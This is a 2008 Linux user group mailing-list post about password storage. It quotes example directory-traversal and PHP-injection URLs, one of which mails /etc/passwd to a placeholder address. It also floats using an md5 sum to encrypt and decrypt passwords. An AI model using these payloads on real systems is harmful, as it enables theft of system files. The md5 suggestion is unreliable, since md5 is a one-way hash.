[Klug-general] password / security question / coding
oly
oly at digitaloctave.com
Sat Oct 18 23:36:27 UTC 2008
> >
> > _______________________________________________
> > Kent mailing list
> > Kent at mailman.lug.org.uk
> > https://mailman.lug.org.uk/mailman/listinfo/kent
>
> dont forget any web application can be a potential way into a server for an
> attacker, as well as any listening daemons running on a box. If a web app can
> read a file then the box does not need to be compromised for the attacker to
> get the contents, just the app itself. here is a really basic (and stupid)
> example:
>
> the logon url for an app is:
> http://url/script.php?template=login.html
>
> an attacker could try (dir traversal):
> http://url/script.php?template=../../../../secret/passwd.txt
>
> or even (code execution):
> http://url/script.php?template=<%php
> mail('a at a.com', '',file_get_contents('/etc/passwd')); %>
>
> these are lame examples but hopefully they make the point.
>
> You cant hide anything in your source so details of where and how passwords
> are stored will be found, so when implementing security following best
> practices is the way to go.
>
> how about using some kind of master password to encrypt the password storage,
> like how mozilla, firefox etc. can store form passwords. as long as you use
> strong encryption and dont store the key anywhere, it would make breaking
> into that store an unfeasible option for an attacker.
that may be an option but not sure quite what you mean when you say dont
store the key anywhere surely i have to store the key somewhere to
decrypt the store to gain access to the passwords inside.
what about using an md5 sum to encrypt the password then use that same
sum to unencrypt the passwords in the store is that kind of what your
getting at ?
More information about the Kent
mailing list